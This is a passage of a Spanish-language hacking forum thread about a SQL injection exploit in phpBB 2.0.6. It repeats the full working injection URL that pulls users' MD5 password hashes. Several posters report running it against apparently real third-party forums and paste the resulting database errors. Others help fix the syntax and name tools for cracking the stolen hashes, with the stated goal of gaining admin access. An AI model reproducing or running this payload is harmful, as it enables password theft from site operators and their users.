Páginas: [1] 2 
|
 |
|
 Autor
|
Tema: Exploit SQL Inject en PHPBB 2.0.6 (Leído 7459 veces)
|
Rojodos
"If you wanna be free, you must be different"
 Desconectado
Mensajes: 3.525
|
|
|
|
|
|
En línea
|
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 280
No tenes nada mas interesante que leer que esto?
|
otro mas??? estos foros son una cagada... mejor yabbse
|
|
|
|
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 280
No tenes nada mas interesante que leer que esto?
|
estuve tratando de hacerlo funcionar el exploit pero sin exito esto hay: Hello list, Here is the exploit code for phpbb 2.06 sql injection described in http://www.securityfocus.com/archive/1/345872 . It will return MD5 password hash of specified user as [highlight] variable for viewtopic.php in search results page. http://site.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter uid]/* en teoria lo unico que tengo que cambiar es el [enter uid] o algo mas??? |
|
|
|
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
Rojodos
"If you wanna be free, you must be different"
Desconectado
Mensajes: 3.525
|
Creo que solo el UID, pero no estoy seguro...
Este exploit yo no lo he investigado bien (ademas de que no domino con soltura el tema de los SQL injects y en general los SQL querys..)...
Creo que en el mismo advisory del exploit, se explicaba como se hacia...
Salu2
|
|
|
|
|
En línea
|
|
|
|
Bullhack
Desconectado
Mensajes: 149
|
Yo lo e probao y si q me ha funcionao, weno me a dao el pass en MD5. lo he hecho asi: http://www.serverbulne.com/foro/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[id]/* |
|
|
|
|
En línea
|
|
|
|
EL_ZoRRo
Desconectado
Mensajes: 233
|
Bueno yo lo prove el mismo dia que salio la falla y me funciono y obtube estas conclusiones Exploit SQL Inject en PHPBB 2.0.6 Aqui esta: Una manera simple de probar si el bug ha sido remendado es: Código: http://your_site/phpBB2/search.php?search_id=1\. hxxp://your_site/search.php?search_id=1\ hxxp://your_site/phpbb2/search.php?search_id=1\ hxxp://your_site/phpbb2/search.php?search_id=1\ hxxp://your_site/foro/search.php?search_id=1\ esto dependera donde en que paht este el foro Si fue remendado, éste debe devolver el mensaje "No topics or posts met your search criteria". Si no ha sido parcheado, usted conseguirá un error de SQL Exploit Código: http://site.com/search.php?search_id=1%20union%20select%20concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125))%20from%20phpbb_users%20where%20user_id=[enter uid]/ hxxp://your_site/phpBB2/exploit.... hxxp://your_site/phpbb2/exploit..... hxxp://your_site/foro//expploit...... Como ya dije antes dependiendo del paht Luego tiene solo que buscar los pass hasheados Saludos |
|
|
|
|
En línea
|
|
|
|
Kerber0
Desconectado
Mensajes: 102
Yo me Amo!
|
Cómo saco el UID ??
|
|
|
|
|
En línea
|
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 280
No tenes nada mas interesante que leer que esto?
|
me devulve esto DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '[2]/* AND session_id = 'be27f28170606cac406d045cr00290c1
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 union select concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=[2]/* AND session_id = 'be27f28170606cac406d045cr00290c1'
Line : 693
File : /xxx/xxxx/xxxxx/xxx/search.php be27f28170606cac406d045cr00290c1 es el pass md5????? y si asi fuera como lo desencripto ya que no conozco ningun exploit que con insertar el md5 me arroje admin.. |
|
|
|
« Última modificación: 12 Diciembre 2003, 11:04 por -_-[S@BuEsOhAcK]-_- »
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
®®
Colaborador
 Conectado
Mensajes: 5.266
|
esque lo estas poniendo mal, pones where user_id=[2]/* los corchetes no los pongas ([]).
|
|
|
|
|
En línea
|
|
|
|
-_-[S@BuEsOhAcK]-_-
Desconectado
Mensajes: 280
No tenes nada mas interesante que leer que esto?
|
tenes razon no me di cuenta....
bueno lo puse como me dijistes pero me arrojo un resultado de busqueda de temas.. eso quiere decir que esta parcheado.. o no? .
pero de todas maneras como desencripto el hash md5?
|
|
|
|
|
En línea
|
uh ah.. pone a franchela..
xD
|
|
|
®®
Colaborador
Conectado
Mensajes: 5.266
|
tu sabras si esta o no parcheado que estas usandolo. sobre lo de crackear md5 ya se a tocado mucho en el foro, usa el buscador. (incluso puede que lo tengas pinchado)
|
|
|
|
|
En línea
|
|
|
|
Darkoz
Desconectado
Mensajes: 259
No olvides lo aprendido, no dejes de comprender.
|
Pero haber, esa linea sirve para sacar el pass MD5, no? i quando ya lo tenemos con k exploit creamos un admin?
|
|
|
|
|
En línea
|
The gods Made Heavy Metal!
|
|
|
oz
Desconectado
Mensajes: 6
¡Amo YaBB SE!
|
para crakear los passwords hash de MD5 usa el cain o john the ripper o Mdcrack,bueno ahora mi pregunta i diculpen si esta muy mensa pero que se pone en el enter uid alguien que me explique por favor,segun yo se debe de poner el uid sin nada de los [ enter uid] osea se pone normal user_id=charly/* pero que es el uid es el nombre de el usario o el numero de usario porque ya le intente con los dos i me da este error,
SQL Error : 1054 Unknown column 'charly' in 'where clause'
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 union select concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=charly/* AND session_id = '2999bdc551067d92434bbe2f38cfe129'
???
|
|
|
|
|
En línea
|
|
|
|
Heaven
Desconectado
Mensajes: 4
¡Amo YaBB SE!
|
Oz el uid es un numero ... SELECT search_array FROM phpbb_search_results WHERE search_id = 1 union select concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=charly/* AND session_id = '2999bdc551067d92434bbe2f38cfe129'
¿Porque añades al final de la consulta AND session_id= '2999bdc551067d92434bbe2f38cfe129' ? Eso sobra, la consulta acaba en "user_id=id/*, si no me equivoco el /* representa el resto de la consulta, que lo ejecuta internamente el phpBB en el archivo search.php. Una vez estas logeado, el phpBB ya coge automaticamente tu session_id ... Espero te sirva de algo, yo tambien he encontrado un foro con el error y no consigo obtener el md5 . |
|
|
|
|
En línea
|
|
|
|
Joses
Desconectado
Mensajes: 3
¡Amo YaBB SE!
|
Erro Geral
Could not obtain search results
DEBUG MODE
SQL Error : 1064 You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near 'majui/ AND session_id = '090866c71626fd25875731804dde794
SELECT search_array FROM phpbb_search_results WHERE search_id = 1 union select concat(char(97,58,55,58,123,115,58,49,52,58,34,115,101,97,114,99,104,95,114,101,115,117,108,116,115,34,59,115,58,49,58,34,49,34,59,115,58,49,55,58,34,116,111,116,97,108,95,109,97,116,99,104,95,99,111,117,110,116,34,59,105,58,53,59,115,58,49,50,58,34,115,112,108,105,116,95,115,101,97,114,99,104,34,59,97,58,49,58,123,105,58,48,59,115,58,51,50,58,34),user_password,char(34,59,125,115,58,55,58,34,115,111,114,116,95,98,121,34,59,105,58,48,59,115,58,56,58,34,115,111,114,116,95,100,105,114,34,59,115,58,52,58,34,68,69,83,67,34,59,115,58,49,50,58,34,115,104,111,119,95,114,101,115,117,108,116,115,34,59,115,58,54,58,34,116,111,112,105,99,115,34,59,115,58,49,50,58,34,114,101,116,117,114,110,95,99,104,97,114,115,34,59,105,58,50,48,48,59,125)) from phpbb_users where user_id=niric majui/ AND session_id = '090866c71626fd25875731804dde7941'
Line : 693
File : /home/lokirj/public_html/forums/search.php
Si consigo crackear el md5, se supone que es el password de el usar niric majui? gracias
|
|
|
|
|
En línea
|
|
|
|
|
Páginas: [1] 2 
|
|
|
 |
